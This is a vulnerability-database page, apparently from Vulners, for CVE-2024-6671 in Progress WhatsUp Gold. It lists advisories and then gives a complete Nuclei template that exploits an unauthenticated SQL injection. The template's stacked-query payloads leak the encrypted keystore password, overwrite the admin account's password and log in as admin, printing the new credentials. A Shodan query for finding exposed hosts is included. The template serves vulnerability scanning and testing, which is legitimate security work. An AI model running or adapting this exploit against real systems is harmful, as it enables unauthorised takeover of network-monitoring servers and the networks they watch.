| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| The vulnerability of the WhatsUp Gold network infrastructure monitoring system lies in the lack of protective measures for the SQL query structure, allowing attackers to gain unauthorized access to user accounts. | 16 Dec 202400:00 | – | bdu_fstec | |
| CVE-2024-6671 | 24 Aug 202409:50 | – | circl | |
| WhatsUp Gold 安全漏洞 | 29 Aug 202400:00 | – | cnnvd | |
| CVE-2024-6671 | 29 Aug 202422:06 | – | cve | |
| CVE-2024-6671 WhatsUp Gold GetStatisticalMonitorList SQL Injection Authentication Bypass Vulnerability | 29 Aug 202422:06 | – | cvelist | |
| EUVD-2024-47722 | 3 Oct 202520:07 | – | euvd | |
| Vulnerabilities fixed in Progress WhatsUp Gold | 2 Sep 202411:51 | – | ncsc | |
| CVE-2024-6671 | 29 Aug 202422:15 | – | nvd | |
| CVE-2024-6671 | 29 Aug 202422:15 | – | osv | |
| Progress WhatsUp Gold < 24.0.0 Multiple Vulnerabilities (000263015) | 27 Aug 202400:00 | – | nessus |
| Source | Link |
|---|---|
| zerodayinitiative | www.zerodayinitiative.com/advisories/ZDI-24-1186/ |
| community | www.community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024 |
| progress | www.progress.com/network-monitoring |
id: CVE-2024-6671
info:
name: WhatsUp Gold GetStatisticalMonitorList SQL Injection - Authentication Bypass
author: daffainfo,jjcho
severity: critical
description: |
In WhatsUp Gold versions released before 2024.0.0, if the application is configured with only a single user, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
impact: |
Unauthenticated attackers can exploit SQL injection to retrieve encrypted user passwords, modify admin credentials, and achieve authentication bypass for full system access.
remediation: |
Update WhatsUp Gold to version 2024.0.0 or later to address the SQL injection vulnerability.
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-24-1186/
- https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
- https://www.progress.com/network-monitoring
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-6671
cwe-id: CWE-89
epss-score: 0.14886
epss-percentile: 0.96292
cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
product: whatsup_gold
vendor: progress
tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,vkev,vuln
flow: |
http(1);
http(2);
http(3);
encryptedPassword = template.encryptedPassword
const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
const hexValues = cleanedInput.map(value => {
const num = parseInt(value);
return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
});
const hexString = hexValues.join('');
const varbinaryString = '0x' + hexString;
set("encryptedPassword", varbinaryString);
http(4) && http(5);
variables:
username: "admin"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(set_cookie, 'ASP.NET_SessionId=')
condition: and
internal: true
- raw:
- |
POST /NmConsole/Platform/Filter/DeviceStatisticalMonitors HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"deviceId":"1234","statisticalMonitorTable":"StatisticalPingCache si on p.nPivotStatisticalMonitorTypeToDeviceID = si.nPivotStatisticalMonitorTypeToDeviceID; UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');Select null,null,null,null,null,null From PivotStatisticalMonitorTypeToDevicep Inner Join StatisticalPingCache","includeDisabledMonitors":"true","statisticalIdentificationId":"1"}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
- contains(body, '[]')
condition: and
internal: true
- raw:
- |
GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'DisplayName')
condition: and
internal: true
extractors:
- type: regex
internal: true
name: encryptedPassword
regex:
- '"psyduck\d+(,\d+)*"'
- raw:
- |
POST /NmConsole/Platform/Filter/DeviceStatisticalMonitors HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"deviceId":"1234","statisticalMonitorTable":"StatisticalPingCache si on p.nPivotStatisticalMonitorTypeToDeviceID = si.nPivotStatisticalMonitorTypeToDeviceID; UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';Select null,null,null,null,null,null From PivotStatisticalMonitorTypeToDevicep Inner Join StatisticalPingCache","includeDisabledMonitors":"true","statisticalIdentificationId":"1"}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
- contains(body, '[]')
condition: and
internal: true
- raw:
- |
POST /NmConsole/User/LoginAjax HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&rememberMe=false
matchers:
- type: word
part: body
words:
- '"authenticated":true'
- '"username":"'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
# digest: 4a0a00473045022100d3c24effc65431bd9b92a95997d4bd0f8076d4a76a04fd78fcc6f4574a3c35ed02201a01fc17e22b491894fed60dfbb33fb1e3d291cc2b751c848c61b46859ee3021:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation